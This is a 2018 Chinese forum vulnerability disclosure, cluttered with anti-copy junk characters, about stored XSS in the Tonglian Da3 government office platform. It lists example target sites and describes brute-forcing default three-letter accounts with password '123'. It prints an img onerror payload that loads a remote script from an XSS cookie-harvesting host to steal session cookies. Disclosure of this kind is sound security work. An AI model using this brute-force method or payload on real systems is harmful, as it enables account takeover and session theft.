2 ~ ]! i4 t5 j& u
$ s# Y9 f. x' \' ? 同联Da3协同办公平台后台通用储存型xss漏洞
! k8 {/ k4 r3 q0 r1 }* T" \
* Y. _6 _1 [$ o$ I
' X _9 N0 o1 {1 x) ~# G 平台简介:# A/ t. B, b/ `2 a* v2 P+ e
4 B: E6 v" V3 |8 ?# Q " I8 W! D4 |; |; L3 Q- z
. f( N- f/ v9 }/ A
. O) o! ~( _# u; b8 ^' a
@# ?* z9 F( i0 Z 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
8 b9 R* G+ ^7 F I& h2 c同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
0 B( ~+ ]% l3 k& M4 \同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!' M; z% U4 Q+ F
8 l0 h3 o* ]1 w2 e! u9 }2 B6 m
8 I! z( X L' g9 Q* |- d % _7 @3 C: o8 k
% ?( t/ W5 c5 z 9 h1 ?$ l( x% C
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
1 _# {; m3 i/ V( s( q$ r
( K! i9 s4 F" H7 R* ^. W
6 H( \+ U' ]5 `! j+ e; U/ a7 o7 e " f& m: S5 G( {6 `1 b; o, E- w. z+ s/ g
" n4 `# ]0 w# n& D4 B
& C2 ?9 T( y F& J R) ]$ e/ k http://1.1.1.1:7197/cap-aco/#(案例2-)2 X$ p! ~# F) ~1 U/ _9 e
6 T5 a6 z) Z) O; Y' Y$ v; `5 s
( J Q" L* w6 N0 T) j% c. d http://www.XXOO.com (案例1-官网网站)
( X: v8 q# N( Y0 b' D2 h3 L
( z' p" p B: \; Y, B ( S3 Y5 P. i$ w( ^8 o- b" m# T/ N# V
漏洞详情:
6 {2 S& m4 u* {: J" p$ b, j1 U
9 @. i) ]4 V: p9 b8 M, g9 H
4 J; k; j ~: x; }4 K# ]. n5 n4 n+ h& m 案例一、' J* B9 D( C; J/ z3 z; J) O; `3 W
) t; J- @6 j b+ B % |5 F1 y. n$ h1 }( q
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试) ` d9 e: [! \. [; I3 Z1 r& l
; r, F- t4 N9 [8 T
; L4 A. ], T% e2 R$ F6 m+ B# c 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
5 b" J9 T- J# a9 }6 N; N
8 B; _3 m6 J/ l 9 Z' t( c9 t' D, T9 e3 \
) v- J: d, N! R
' k y' y) h$ w# o# ? R
. H. c& x, x- k! X9 u. K2 W 
' [- T, z1 i: W- Q* z' x; J4 p
+ O/ ~6 R1 r0 P
1 L. k: ~. p/ D0 x/ ?; y& B: e0 b
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
; H* h- d& D ~8 {0 \* p
6 A1 t0 B0 ]% K( ^ U8 O! w* p2 I, h5 n5 z3 ` @6 y
9 _; |$ P; u! f# I. z7 ^$ Q
: d6 z6 m+ j( Y0 U; ^5 N1 p( s6 F
. `0 h5 r u7 U: s
' Q- H5 U) ?; F2 s( H2 x
; U$ ]* z2 Z) n. _# v - Y/ |' T; G/ G- z# w ~
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
6 X- \. M1 M4 s6 a' o' a; f Q9 B! v
0 S% L1 Y0 X! T' O" U
0 ~" t1 e) a, h- u
7 p5 H2 _5 s d
. \! d* \+ s t/ _4 Q) l8 O
+ Z7 G6 D8 u4 U3 p% Z# A% K* z <img src=x: `' S1 A8 g! F
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: % \- |3 V2 e# k5 j
3 x3 r, m9 H- C4 [7 w( _5 ]6 O
: x; D3 U9 ]9 _& @ ~
S: T6 @2 y5 o2 P; Y+ w5 p7 V' L
# \5 D. `/ \* H6 Q* t* V8 r2 [9 ?& N , G1 z) ]4 [ e3 S+ ]
然后发送,接收cookie如图: d% S1 Y! l8 S! n7 p
( n9 R6 {. H0 J6 \! |
6 L3 X5 n& f/ N1 E& S: s+ M5 F , e" g4 D L, E; t# G5 e9 p2 L
: |6 t9 O# n6 U! e/ K
( E7 O- [; C. p Z
' s8 o. q+ X& }9 M; E
j0 I% e& ?& _
$ E0 d, ^( l& F4 S 3 y4 K$ m9 k% [
7 @$ L, u" \- }: a* [
& j/ m4 Q w: G, ~9 L
; K: c" M# `4 ~
# ?: \$ h3 U9 r3 `+ z& o 4 l" i& V' d* K: t: A r
4 J. s0 _, z: i2 J6 y2 x
& L4 a S6 w- y) ?6 z
4 o V7 @* ~9 L" N
0 S+ A. |6 p& J" T; }
/ V: K7 f6 W1 G! X' u
5 L6 c$ O% Q. j1 D7 y
2 q- W7 _5 A/ P) D9 c
) S5 w0 q4 K: u( T# Q- J! w
* N( Q& Y+ V1 T J I, G' l 案例2、
" W" o) `- K9 q5 u ~: _8 J3 }+ r, s2 b
m y) d& F) O1 D8 s- Q( U
9 d/ m1 Z; b1 y 前面步骤都一样,下面看效果图: : g# j' V' x! _. }7 q# ^. _+ X# m
2 t7 S- B+ j& W1 F/ I: y
* V& e7 u( g4 M5 D8 E# B, Q
( ^: Q/ L0 I+ O
& B+ Z* _& M' I/ I
& k1 [$ K5 {, t. T5 D: R 
, Q8 S& u- P/ q2 A' Q
/ f! I' s A& h/ o6 i
$ z% I% | t- L7 H! I
. m. F% j# D9 ]$ q" w
9 z3 P% d( \! _6 E6 Q 3 v( Y e8 o. \; |- H# B, l% G
; L$ B' r8 E" B( U8 ^
. g6 G# ^0 t% [; |# T7 v/ F . o! G; U$ ]6 r1 G% ~
* O5 L* T- Y' E7 _: k- |
* g+ o+ J* [( j
% a3 g' ?" p5 v1 i8 n, N " y* n0 o$ f" v' h* K, V# }2 { i
% L M4 I* Y8 }6 Y" }6 ?5 b
# ?3 r, S- R0 W2 f# `
: y/ N. Q* Y0 Z! Q! c0 r7 ^
2 z: H$ P% Q3 A( D/ r' m r$ B$ j 8 K; l ^ I; f z! c7 q1 q( C J4 U
8 V. J+ h& @/ F& o) W, t9 }
) q) ?9 a! u2 F ?' x
: F7 r# w" t" @8 k1 x% n0 F
4 a! @ B3 T: \9 \$ U1 r
& u6 F" T9 q, I" s- q9 \ 
发表于 2018-10-20 20:14:15
收藏
支持
反对